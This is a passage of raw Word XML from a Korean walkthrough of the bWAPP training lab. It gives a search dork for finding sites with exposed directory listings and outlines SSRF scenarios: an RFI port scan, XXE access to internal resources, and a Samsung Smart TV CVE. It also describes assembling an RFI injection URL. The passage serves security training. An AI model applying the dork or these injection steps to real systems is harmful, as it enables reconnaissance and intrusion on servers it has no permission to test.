    <w:p w14:paraId="677E2851" w14:textId="6DDDA21C" w:rsidR="008046EE" w:rsidRPr="0035631E" w:rsidRDefault="008046EE" w:rsidP="00F769B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AA10195" w14:textId="3DC6A33F" w:rsidR="008046EE" w:rsidRPr="0035631E" w:rsidRDefault="008046EE" w:rsidP="00F769B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="087173DE" w14:textId="0376C62C" w:rsidR="008046EE" w:rsidRPr="0035631E" w:rsidRDefault="008046EE" w:rsidP="00F769B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E9D3423" w14:textId="08742945" w:rsidR="008046EE" w:rsidRPr="0035631E" w:rsidRDefault="008046EE" w:rsidP="00F769B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B5FFBAE" w14:textId="638B32BD" w:rsidR="008046EE" w:rsidRPr="0035631E" w:rsidRDefault="008046EE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추가로 포털 검색창에 </w:t>
      </w:r>
      <w:r w:rsidR="00C711A0" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">ex) </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>intitle:"index of" intext":</w:t>
      </w:r>
      <w:r w:rsidR="00C711A0"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최신영화</w:t>
      </w:r>
      <w:r w:rsidR="00C711A0" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 등을 검색하면 디렉터리 리스팅 취약점이 많이 발견된다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BBCF0B" w14:textId="77777777" w:rsidR="00FA3148" w:rsidRPr="0035631E" w:rsidRDefault="00FA3148" w:rsidP="00F769B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A356A5C" w14:textId="1CB7F3EB" w:rsidR="008046EE" w:rsidRPr="0035631E" w:rsidRDefault="008046EE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3DC52216" wp14:editId="6942CA07">
            <wp:extent cx="6840001" cy="3893229"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="1206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389322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E707F" w14:textId="7CCDEC4C" w:rsidR="00FA3148" w:rsidRPr="0035631E" w:rsidRDefault="008046EE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07FA4796" wp14:editId="7CC8F805">
            <wp:extent cx="6840001" cy="4459047"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="1778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459047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0B3623" w:rsidRPr="0035631E" w14:paraId="080541E8" w14:textId="77777777" w:rsidTr="00E00869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bookmarkStart w:id="16" w:name="H2"/>
          <w:bookmarkEnd w:id="16"/>
          <w:p w14:paraId="77DD835B" w14:textId="4FA91583" w:rsidR="000B3623" w:rsidRPr="0035631E" w:rsidRDefault="00FE13B7" w:rsidP="000B3623">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="44"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="44"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> HYPERLINK  \l "H1" </w:instrText>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="44"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="44"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="000B3623" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="44"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidR="000B3623" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="000B3623" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
            <w:r w:rsidR="000B3623" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
              </w:rPr>
              <w:t>erver Side Requ</w:t>
            </w:r>
            <w:r w:rsidR="000B3623" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
              </w:rPr>
              <w:t>e</w:t>
            </w:r>
            <w:r w:rsidR="000B3623" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rStyle w:val="a8"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="44"/>
                <w:szCs w:val="44"/>
              </w:rPr>
              <w:t>st Forgery(SSRF)</w:t>
            </w:r>
            <w:r w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="44"/>
                <w:szCs w:val="48"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B3623" w:rsidRPr="0035631E" w14:paraId="3500D333" w14:textId="77777777" w:rsidTr="00E00869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763B90ED" w14:textId="6633C490" w:rsidR="000B3623" w:rsidRPr="0035631E" w:rsidRDefault="000B3623" w:rsidP="00E00869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6B08BAE0" w14:textId="5431907F" w:rsidR="000B3623" w:rsidRPr="0035631E" w:rsidRDefault="000B3623" w:rsidP="00E00869">
            <w:pPr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35631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[</w:t>
            </w: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 </w:t>
            </w:r>
            <w:r w:rsidRPr="0035631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S</w:t>
            </w:r>
            <w:r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erver Side Request Forgery</w:t>
            </w:r>
            <w:r w:rsidR="00ED1AD5"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(SSRF) </w:t>
            </w:r>
            <w:r w:rsidR="00ED1AD5" w:rsidRPr="0035631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 xml:space="preserve">난이도 </w:t>
            </w:r>
            <w:r w:rsidR="00ED1AD5"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: </w:t>
            </w:r>
            <w:r w:rsidR="00ED1AD5" w:rsidRPr="0035631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 xml:space="preserve">공통 </w:t>
            </w:r>
            <w:r w:rsidR="00ED1AD5" w:rsidRPr="0035631E">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CBE20E5" w14:textId="754514CA" w:rsidR="000B3623" w:rsidRPr="0035631E" w:rsidRDefault="000B3623" w:rsidP="00E00869">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5344970B" w14:textId="51EB8DC5" w:rsidR="00ED1AD5" w:rsidRPr="0035631E" w:rsidRDefault="000B3623" w:rsidP="00F769B7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789A28C4" wp14:editId="20F9541E">
            <wp:extent cx="6840001" cy="2538368"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="146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53836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93B231" w14:textId="050A2E7A" w:rsidR="007252C0" w:rsidRPr="0035631E" w:rsidRDefault="00ED1AD5" w:rsidP="007252C0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페이지에 접속하면 S</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>SRF</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">에 대한 간략한 설명과 </w:t>
      </w:r>
      <w:r w:rsidR="007252C0" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="007252C0" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">개의 </w:t>
      </w:r>
      <w:r w:rsidR="00E00869" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>시나리오</w:t>
      </w:r>
      <w:r w:rsidR="007252C0" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 주어진다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D62259" w14:textId="6E06039C" w:rsidR="007252C0" w:rsidRPr="0035631E" w:rsidRDefault="007252C0" w:rsidP="007252C0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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R</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>FI</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 사용하여 내부 네트워크에서 호스트를 검색</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C57A32" w14:textId="623B238B" w:rsidR="007252C0" w:rsidRPr="0035631E" w:rsidRDefault="007252C0" w:rsidP="007252C0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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X</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>XE</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 사용하여 내부 네트워크의 리소스에 액세스</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CF6A49" w14:textId="44C4D92F" w:rsidR="007252C0" w:rsidRPr="0035631E" w:rsidRDefault="007252C0" w:rsidP="007252C0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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X</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>XE</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 사용하여 C</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>VE-2013-4890</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의 취약점을 이용한 삼성 스마트</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">TV </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>공격</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECCB4AB" w14:textId="64DBA978" w:rsidR="007252C0" w:rsidRPr="0035631E" w:rsidRDefault="007252C0" w:rsidP="00E00869">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A014645" w14:textId="297B0658" w:rsidR="00E00869" w:rsidRPr="0035631E" w:rsidRDefault="00F172E8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549CE0AF" wp14:editId="539A5FBB">
            <wp:extent cx="6840001" cy="1801326"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="279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80132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7A2AFF" w14:textId="7107E2F8" w:rsidR="00F172E8" w:rsidRPr="0035631E" w:rsidRDefault="00F172E8" w:rsidP="00E00869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# cd /var/www/evil/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F46DBEE" w14:textId="53A9E3CB" w:rsidR="00F172E8" w:rsidRPr="0035631E" w:rsidRDefault="00F172E8" w:rsidP="00E00869">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ls -l ssrf*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3794BA1D" w14:textId="7E86D2E8" w:rsidR="00F172E8" w:rsidRPr="0035631E" w:rsidRDefault="00DA4FBF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위 경로에서 시나리오 관련 파일의 코드들을 확인할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1555FEAD" w14:textId="1F17F802" w:rsidR="00DA4FBF" w:rsidRPr="0035631E" w:rsidRDefault="00DA4FBF" w:rsidP="00E00869">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7592314D" w14:textId="047A493E" w:rsidR="00DA4FBF" w:rsidRPr="0035631E" w:rsidRDefault="00DA4FBF" w:rsidP="00E00869">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62588326" w14:textId="78AC2869" w:rsidR="00DA4FBF" w:rsidRPr="0035631E" w:rsidRDefault="00DA4FBF" w:rsidP="00E00869">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F973BA7" w14:textId="67D86B14" w:rsidR="00DA4FBF" w:rsidRPr="0035631E" w:rsidRDefault="00DA4FBF" w:rsidP="00E00869">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7490D061" w14:textId="72970B93" w:rsidR="00DA4FBF" w:rsidRPr="0035631E" w:rsidRDefault="00DA4FBF" w:rsidP="00E00869">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27A40DCD" w14:textId="77777777" w:rsidR="00DA4FBF" w:rsidRPr="0035631E" w:rsidRDefault="00DA4FBF" w:rsidP="00E00869">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36A941E4" w14:textId="77777777" w:rsidR="00192F22" w:rsidRPr="0035631E" w:rsidRDefault="00192F22" w:rsidP="00192F22">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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Port scan hosts on the internal network using RFI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33ADB642" w14:textId="2E3F775F" w:rsidR="00F172E8" w:rsidRPr="0035631E" w:rsidRDefault="00192F22" w:rsidP="00192F22">
      <w:pPr>
        <w:ind w:left="400"/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00F172E8" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>RFI를 이용한 포트 스캔</w:t>
      </w:r>
      <w:r w:rsidR="00F172E8" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(bWAPP 내부망에 다른 시스템이 없기 때문에 bWAPP을 타겟으로 실시</w:t>
      </w:r>
      <w:r w:rsidR="00B25403" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>함</w:t>
      </w:r>
      <w:r w:rsidR="00F172E8" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7882E57C" w14:textId="34AC9FE5" w:rsidR="00F172E8" w:rsidRPr="0035631E" w:rsidRDefault="00F172E8" w:rsidP="00E00869">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D3152C8" w14:textId="17C7DF3C" w:rsidR="00F172E8" w:rsidRPr="0035631E" w:rsidRDefault="007F55DB" w:rsidP="00E00869">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="24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28F2A407" wp14:editId="6C2842DE">
            <wp:extent cx="6840001" cy="2973202"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="1778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973202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CBCCD9" w14:textId="012A3B35" w:rsidR="007F55DB" w:rsidRPr="0035631E" w:rsidRDefault="007F55DB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P</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">ort scan </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>링크 클릭</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2E02DF" w14:textId="3199C837" w:rsidR="007F55DB" w:rsidRPr="0035631E" w:rsidRDefault="007F55DB" w:rsidP="00E00869">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73A2B075" w14:textId="380D9DAE" w:rsidR="0026314E" w:rsidRPr="0035631E" w:rsidRDefault="0026314E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4754814D" wp14:editId="380751B4">
            <wp:extent cx="6840001" cy="1140001"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="222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14000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9F0A75" w14:textId="49FDF62D" w:rsidR="0026314E" w:rsidRPr="0035631E" w:rsidRDefault="0026314E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'ssrf-1.txt' 파일 URL 주소</w:t>
      </w:r>
      <w:r w:rsidR="00235628" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 복사</w:t>
      </w:r>
      <w:r w:rsidR="00235628" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>해 놓는다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A76551" w14:textId="77777777" w:rsidR="00235628" w:rsidRPr="0035631E" w:rsidRDefault="00235628" w:rsidP="00E00869">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BE0669B" w14:textId="75A17FDB" w:rsidR="0026314E" w:rsidRPr="0035631E" w:rsidRDefault="0026314E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5333E7AE" wp14:editId="6454A8F9">
            <wp:extent cx="6840001" cy="1865514"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="2095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86551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E64B85" w14:textId="4FB2F3DC" w:rsidR="0026314E" w:rsidRPr="0035631E" w:rsidRDefault="00671AE2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501510EE" wp14:editId="55721CC8">
            <wp:extent cx="6840001" cy="1136193"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="260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13619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3D9A29" w14:textId="301792FC" w:rsidR="00671AE2" w:rsidRPr="0035631E" w:rsidRDefault="00671AE2" w:rsidP="00671AE2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RFI</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 이용하라고 했으므로 'Remote &amp; Local File Inclusion(RFI/LFI)' 시나리오를 선택한 뒤 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>‘Go’</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 버튼 클릭 후 </w:t>
      </w:r>
      <w:r w:rsidR="00235628" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">나오는 </w:t>
      </w:r>
      <w:r w:rsidR="00235628" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00235628" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 복사한 뒤 위의 'ssrf-1.txt' 파일 URL과 조합하여 인젝션 코드를 만든다. </w:t>
      </w:r>
      <w:r w:rsidR="00235628" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">[] </w:t>
      </w:r>
      <w:r w:rsidR="00235628" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>안에 추가.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70333D41" w14:textId="77777777" w:rsidR="00235628" w:rsidRPr="0035631E" w:rsidRDefault="009678B1" w:rsidP="00E00869">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId95" w:history="1">
        <w:r w:rsidR="00235628" w:rsidRPr="0035631E">
          <w:rPr>
